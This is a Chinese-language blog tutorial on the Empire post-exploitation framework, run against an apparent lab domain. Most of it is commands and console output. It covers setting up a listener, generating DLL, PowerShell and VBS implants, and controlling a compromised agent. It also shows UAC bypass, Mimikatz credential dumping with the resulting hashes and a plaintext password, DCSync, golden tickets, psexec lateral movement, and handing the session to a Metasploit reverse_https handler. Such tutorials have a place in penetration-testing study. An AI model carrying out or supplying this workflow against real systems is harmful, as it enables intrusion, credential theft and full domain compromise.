Marksec's Blog.

Empire学习指南

字数统计: 2.2k阅读时长: 11 min
2018/12/06 Share

empire是一款基于python编写的,使用powershell进行后渗透的工具,它类似于metasploit的渗透测试框架,empire可以实现无需powershell.exe即可运行PowerShell 代理的功能,从键盘记录器到Mimikatz 等快速部署的后期开发模块,以及适应性通信以避开网络检测,所有这些都包含在以可用性为重点的框架中。目前empire的版本号为empire2.5

安装启动

1
2
3
4
5
git clone https://github.com/EmpireProject/Empire.git    
cd Empire/
cd setup/
./install.sh
./empire

模块简介

empire主要的只要功能模块为

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
(Empire) > help

Commands
========
agents Jump to the Agents menu. 回连靶机
creds Add/display credentials to/from the database. 数据库中写入的各类凭据(主要为口令一类)
exit Exit Empire
help Displays the help menu.
interact Interact with a particular agent. 与现有agents进行交互
list Lists active agents or listeners. 列出当前活跃的监听器或服务端
listeners Interact with active listeners. 进入监听器设置接口
load Loads Empire modules from a non-standard folder. 加载自定义模块或其他扩展模块接口(默认为empire当前目录)
plugin Load a plugin file to extend Empire. 加载自定义插件或其他扩展插件
plugins List all available and active plugins. 列出所有载入的插件列表
preobfuscate Preobfuscate PowerShell module_source files 预混淆功能
reload Reload one (or all) Empire modules. 同MSFreload功能
report Produce report CSV and log files: sessions.csv, credentials.csv, master.log 输出报告
reset Reset a global option (e.g. IP whitelists). 重置ip黑白名单、混淆项目等
resource Read and execute a list of Empire commands from a file. 批量导入empire命令执行
searchmodule Search Empire module names/descriptions. 模块关键词搜索
set Set a global option (e.g. IP whitelists). 设置ip黑白名单、混淆项目等
show Show a global option (e.g. IP whitelists). 查看当前框架设置,也就是set默认值
usemodule Use an Empire module. 使用某一模块
usestager Use an Empire stager. 使用某一载荷

使用方法

1
2
3
4
5
6
7
创建listener
启用listener
使用launcher启动一个powershell
在目标靶机上执行代码
与代理交互
执行多种模块
绕过UAC来获取admin权限

首先输入listener进入listener交互模式,然后输入uselistener+空格再按tab键就可以使用你想生成的连接方式,然后再进行监听的基本设置就可以完成了。当我们想删除直接使用kill+Name就可以了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
(Empire) > listeners
(Empire: listeners) > uselistener
dbx http_com http_hop meterpreter redirector
http http_foreign http_mapi onedrive
(Empire: listeners) > uselistener http //设置为http
(Empire: listeners/http) > info //查看设置详情
(Empire: listeners/http) > set Name test //设置名字
(Empire: listeners/http) > execute //启动
(Empire: listeners/http) > back //返回
(Empire: listeners) > list //列出当前的监听列表

[*] Active listeners:

Name Module Host Delay/Jitter KillDate
---- ------ ---- ------------ --------
test http http://192.168.199.124:80 5/0.0

接着我们进行木马的制作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
(Empire: listeners) > usestager //列出可选择模块
multi/bash multi/war osx/dylib osx/macro windows/backdoorLnkMacro windows/ducky windows/launcher_sct windows/macroless_msword
multi/launcher osx/applescript osx/jar osx/pkg windows/bunny windows/hta windows/launcher_vbs windows/shellcode
multi/macro osx/application osx/launcher osx/safari_launcher windows/csharp_exe windows/launcher_bat windows/launcher_xml windows/teensy
multi/pyinstaller osx/ducky osx/macho osx/teensy windows/dll windows/launcher_lnk windows/macro

dll木马:
(Empire: listeners) > usestager windows/dll
(Empire: stager/windows/dll) > info

Name: DLL Launcher

Description:
Generate a PowerPick Reflective DLL to inject with
stager code.

Options:

Name Required Value Description
---- -------- ------- -----------
Listener True Listener to use.
ProxyCreds False default Proxy credentials
([domain\]username:password) to use for
request (default, none, or other).
Obfuscate False False Switch. Obfuscate the launcher
powershell code, uses the
ObfuscateCommand for obfuscation types.
For powershell only.
Proxy False default Proxy to use for request (default, none,
or other).
Language True powershell Language of the stager to generate.
OutFile True /tmp/launcher.dll File to output dll to.
UserAgent False default User-agent string to use for the staging
request (default, none, or other).
Arch True x64 Architecture of the .dll to generate
(x64 or x86).
ObfuscateCommand False Token\All\1 The Invoke-Obfuscation command to use.
Only used if Obfuscate switch is True.
For powershell only.
StagerRetries False 0 Times for the stager to retry
connecting.


(Empire: stager/windows/dll) > set Listener test
(Empire: stager/windows/dll) > execute

[*] Stager output written out to: /tmp/launcher.dll

powershell木马:
(Empire: listeners) > launcher powershell test //powershell只需launcher powershell+name即可

launcher_vbs木马:
(Empire: listeners) > usestager windows/launcher_vbs
(Empire: stager/windows/launcher_vbs) > info

Name: VBS Launcher

Description:
Generates a .vbs launcher for Empire.

Options:

Name Required Value Description
---- -------- ------- -----------
Listener True Listener to generate stager for.
OutFile False /tmp/launcher.vbs File to output .vbs launcher to,
otherwise displayed on the screen.
Obfuscate False False Switch. Obfuscate the launcher
powershell code, uses the
ObfuscateCommand for obfuscation types.
For powershell only.
ObfuscateCommand False Token\All\1,Launcher\PS\12467The Invoke-Obfuscation command to use.
Only used if Obfuscate switch is True.
For powershell only.
Language True powershell Language of the stager to generate.
ProxyCreds False default Proxy credentials
([domain\]username:password) to use for
request (default, none, or other).
UserAgent False default User-agent string to use for the staging
request (default, none, or other).
Proxy False default Proxy to use for request (default, none,
or other).
StagerRetries False 0 Times for the stager to retry
connecting.


(Empire: stager/windows/launcher_vbs) > set Listener test
(Empire: stager/windows/launcher_vbs) > execute

[*] Stager output written out to: /tmp/launcher.vbs

我们暂时使用powershell木马进行连接实验然后进行后续模块学习,通过在目标机器上粘贴我们的powershell木马进行回连。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
(Empire: agents) > agents  //列表列出当前回连的链路

[*] Active agents:

Name La Internal IP Machine Name Username Process PID Delay Last Seen
---- -- ----------- ------------ -------- ------- --- ----- ---------
A2B7YFVG ps 192.168.199.122 WIN-6S1ISV98BNM *TEST\Administrator powershell 3064 5/0.0 2018-11-04 03:09:33
(Empire: agents) > interact A2B7YFVG //连接进行该目标机进行操作,进入后可以help进行命令了解
(Empire: A2B7YFVG) > help //可以进行mimikatz,bypassuac等等

Agent Commands
==============
agents Jump to the agents menu.
back Go back a menu.
bypassuac Runs BypassUAC, spawning a new high-integrity agent for a listener. Ex. spawn <listener>
clear Clear out agent tasking.
creds Display/return credentials from the database.
download Task an agent to download a file.
exit Task agent to exit.
help Displays the help menu or syntax for particular commands.
info Display information about this agent
injectshellcode Inject listener shellcode into a remote process. Ex. injectshellcode <meter_listener> <pid>
jobs Return jobs or kill a running job.
kill Task an agent to kill a particular process name or ID.
killdate Get or set an agent's killdate (01/01/2016).
list Lists all active agents (or listeners).
listeners Jump to the listeners menu.
lostlimit Task an agent to change the limit on lost agent detection
main Go back to the main menu.
mimikatz Runs Invoke-Mimikatz on the client.
psinject Inject a launcher into a remote process. Ex. psinject <listener> <pid/process_name>
pth Executes PTH for a CredID through Mimikatz.
rename Rename the agent.
resource Read and execute a list of Empire commands from a file.
revtoself Uses credentials/tokens to revert token privileges.
sc Takes a screenshot, default is PNG. Giving a ratio means using JPEG. Ex. sc [1-100]
scriptcmd Execute a function in the currently imported PowerShell script.
scriptimport Imports a PowerShell script and keeps it in memory in the agent.
searchmodule Search Empire module names/descriptions.
shell Task an agent to use a shell command.
shinject Inject non-meterpreter listener shellcode into a remote process. Ex. shinject <listener> <pid>
sleep Task an agent to 'sleep interval [jitter]'
spawn Spawns a new Empire agent for the given listener name. Ex. spawn <listener>
steal_token Uses credentials/tokens to impersonate a token for a given process ID.
sysinfo Task an agent to get system information.
updatecomms Dynamically update the agent comms to another listener
updateprofile Update an agent connection profile.
upload Task an agent to upload a file.
usemodule Use an Empire PowerShell module.
workinghours Get or set an agent's working hours (9:00-17:00).

模块学习

检查UAC提权方法模块

1
2
3
4
(Empire: agents) > interact V92TNFDK //进入目标机
(Empire: V92TNFDK) > usemodule (空格+tab键) //查看usemodule的模块,注意需要在进入到代理主机才能使用该模块,UAC提权需要是管理员组的用户才行
(Empire: V92TNFDK) > usemodule privesc/powerup/allchecks //检查提权方法模块
(Empire: V92TNFDK) > execute //执行检查

UAC提权模块

1
(Empire: V92TNFDK) > bypassuac test //执行uac提权,back之后看到带有*的用户的name,表示代理已提权过

域环境信息收集模块

1
(Empire: V92TNFDK) > usemodule situational_awareness/network/bloodhound //bloodhound是一个域环境收集的工具,在学习empire的时候看见它的后渗透模块也集成了该工具,以后详细介绍该工具

mimikatz模块

1
2
3
4
5
6
7
8
9
10
11
(Empire: V92TNFDK) > mimikatz  //对于后渗透工具,hash dump的工具也是必不可少的
(Empire: V92TNFDK) > creds //列举密码 同时通过pth 也可以进行下一步令牌窃取

Credentials:

CredID CredType Domain UserName Host Password
------ -------- ------ -------- ---- --------
1 hash test.com Administrator WIN-6S1ISV98BNM e19ccf75ee54e06b06a5907af13cef42
2 hash test.com WIN-6S1ISV98BNM$ WIN-6S1ISV98BNM 256897bbd391086a1fea9e03a711487c
3 plaintext test.com Administrator WIN-6S1ISV98BNM P@ssw0rd
4 hash test.com WIN-6S1ISV98BNM$ WIN-6S1ISV98BNM c8c4141f359974d60d46e5a60e0f1407

联动Metasploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
empire:
(Empire: agents) > interact V92TNFDK
(Empire: V92TNFDK) > usemodule code_execution/invoke_shellcode
(Empire: code_execution/invoke_shellcode) > info
(Empire: code_execution/invoke_shellcode) > set Lhost 10.0.0.86
(Empire: code_execution/invoke_shellcode) > set Lport 4433
(Empire: code_execution/invoke_shellcode) > execute

metasploit:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(handler) > set lhost 192.168.199.122
msf exploit(handler) > set lport 4444
msf exploit(handler) > run

其他常用的模块

1
2
3
4
5
(Empire: V92TNFDK) >usemodule situational_awareness/network/find_localadmin_access #加载本地管理组访问模块
(Empire: V92TNFDK) > usemodule lateral_movement/invoke_psexec // psexec模块横向生成一个反弹代理
(Empire: V92TNFDK) > usemodule credentials/mimikatz/dcsync //获取域的krbtgt值
(Empire: V92TNFDK) > usemodule credentials/mimikatz/golden_ticket //获得黄金票据
(Empire: V92TNFDK) >usemodule situational_awareness/host/computerdetails //获取系统日志

总结

Metasploit,Empire,Cobal strike是日常渗透中最经常使用的三大平台,对于三大平台的学习,可以使渗透工作事半功倍,在Empire之后,还有把Cobal strike的日常学习也要总结出来,有时候不经常总结就会遗忘。

本文的学习参考来自于https://xz.aliyun.com/t/67

CATALOG
  1. 1. 安装启动
  2. 2. 模块简介
  3. 3. 使用方法
  4. 4. 模块学习
    1. 4.1. 检查UAC提权方法模块
    2. 4.2. UAC提权模块
    3. 4.3. 域环境信息收集模块
    4. 4.4. mimikatz模块
    5. 4.5. 联动Metasploit
    6. 4.6. 其他常用的模块
  5. 5. 总结